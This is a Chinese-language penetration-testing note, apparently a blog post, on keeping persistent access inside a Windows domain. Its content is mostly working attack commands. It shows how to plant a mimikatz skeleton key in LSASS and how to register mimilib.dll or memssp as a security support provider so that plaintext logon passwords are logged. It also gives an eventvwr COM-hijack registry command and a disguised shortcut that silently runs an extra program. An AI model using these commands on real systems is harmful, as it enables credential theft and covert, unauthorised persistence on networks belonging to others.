内网渗透｜域内持久权限维持总结

0x01 万能密码（Skeleton Key）

将自身注入lsass进程创建一个主密码，可以适用于域内的任意账户。

前提条件是拥有域管权限。

mimikatz执行：

privilege::debug
misc::skeleton

然后ipc连接域控

0x02 SSP

SSPI 将负责为想要通信的两台机器找到合适的协议。对此的首选方法是 Kerberos。然后 SSPI 将协商将使用哪种身份验证协议，这些身份验证协议称为安全支持提供程序 (SSP)，以 DLL 的形式位于每台 Windows 机器内部，并且两台机器必须支持相同才能进行通信。

我们可以自己创建ssp，捕获明文。

2.1 注册SSP DLL

1.将mimilib.dll复制到system32目录下

move mimilib.dll %systemroot%\system32

2.查看Security Packages

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

3.修改Security Packages值

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

密码会保存在:

C:\Windows\System32\kiwissp.log

会产生事件ID为4657的日志。

2.2 内存加载

privilege::debug
misc::memssp

当用户登录的时候密码会储存在

C:\Windows\system32\mimilsa.log

0x03 com劫持

Microsoft 组件对象模型 (COM) 是一个独立于平台、分布式、面向对象的系统，用于创建可以交互的二进制软件组件。

我们可以更改事件管理器，使其打开启动我们的二进制文件。

修改

HKCU\SOFTWARE\Classes\mscfile\shell\open\command

将原来的

%SystemRoot%\system32\mmc.exe "%1" %*

修改为：

C:\windows\system32\cmd.exe

执行：

reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "c:\windows\system32\cmd.exe /c \"start cmd\"" /f
eventvwr.exe

0x04 lnk

这里以该快捷文件为例：

修改目标为：

powershell.exe -c "invoke-item C:\Users\Administrator\Desktop\AdExplorer\ADExplorer64.exe; invoke-item c:\windows\system32\calc.exe"

再把图标修改回来：

运行lnk